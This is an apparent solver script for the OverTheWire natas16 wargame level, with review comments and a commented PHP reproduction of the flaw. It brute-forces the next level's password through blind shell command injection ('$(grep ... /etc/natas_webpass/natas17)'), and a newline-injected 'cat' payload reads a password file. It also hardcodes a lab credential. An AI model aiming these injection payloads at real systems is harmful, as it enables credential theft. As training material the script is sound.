- #!/usr/bin/env python
- import pycurl, requests
# Target level and the HTTP Basic credential that unlocks it.
# NOTE(review): the credential is a literal in the script, so every shared copy
# carries it. The URL scheme is plain http, so the Basic auth header built from
# these values is sent unencrypted.
username = 'natas16'
password = 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'
url = 'http://%s.natas.labs.overthewire.org/index.php' % username

# Marker word appended to every probe. checkChar() reports a hit when this
# word is absent from the response body.
exists = 'administering'
# An earlier variant keyed on the text "This user doesn't exist." instead.
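def checkChar(knownStr, nextChar):
    """Return True when ``knownStr + nextChar`` is a prefix of the target line.

    The request puts ``$(grep -E ^<prefix>.* /etc/natas_webpass/natas17)``
    in front of the marker word in the ``needle`` parameter. The result is
    read from one bit of the response: whether the marker word (``exists``)
    still appears in the page. Presumably a matching inner grep prepends its
    output to the marker, so the outer dictionary search no longer finds it.
    This is inferred from the commented PHP reproduction at the end of the
    file; confirm against the level source.

    Defensive reading of that reproduction: its character filter rejects
    ``; | & ` ' "`` but not ``$(...)``, and the value is interpolated inside
    double quotes, where the shell still performs command substitution.
    Passing the value through ``escapeshellarg()`` (or not invoking a shell
    at all) closes the hole; extending the blacklist does not.

    Args:
        knownStr: prefix already confirmed by earlier calls.
        nextChar: single candidate character to test after the prefix.

    Returns:
        True if the marker word is missing from the response body.

    Raises:
        requests.RequestException: on timeout, connection failure, or a
            non-2xx status.
    """
    urlAll = url+'/?needle=$(grep -E ^'+knownStr+nextChar+'.* /etc/natas_webpass/natas17)administering&submit=Search'
    # Without a timeout a stalled connection blocks the whole run indefinitely.
    r = requests.get(urlAll, auth=(username, password), timeout=30)
    # A 401/5xx page does not contain the marker either. Without this check
    # an auth or server error would be reported as a match for every candidate.
    r.raise_for_status()
    return exists not in r.text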
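import sys  # progress output that behaves the same on Python 2 and 3

# Candidate alphabet; constant, so it is built once rather than per position.
charData = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'

# Pre-fill knownStr with an already recovered prefix to resume a partial run;
# the range below starts at the first unknown position.
knownStr = ""
for i in range(len(knownStr) + 1, 33):
    sys.stdout.write("%d symbol brutes:" % i)
    for char in charData:
        sys.stdout.write(" " + char)
        sys.stdout.flush()
        if checkChar(knownStr, char):
            knownStr += char
            sys.stdout.write(" Found\n")
            break
    else:
        # for/else: reached only when no candidate matched at this position.
        sys.stdout.write(" Not Found\n")
        # The prefix did not grow, so every later position would replay the
        # same failing requests. Stop instead of repeating them.
        break
sys.stdout.write("knownStr " + knownStr + "\n")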
- #<?php
- #
- #$key = 'index.php\ncat /mnt/hgfs/_Share/infosec/overthewire/natas/pass\n ';
- #if(preg_match('/[;|&`\'"]/',$key)) {
- # print "Input contains an illegal character!";
- #} else {
- # print "Everithing OK!\n";
- # print "grep -i \"$key\" dictionary.txt\n";
- # $pass = exec("grep -i \"$key\" dictionary.txt");
- # print $pass;
- #}
- #
- ##intex.php%0Acat /etc/natas_webpass/natas16%0A
- #?>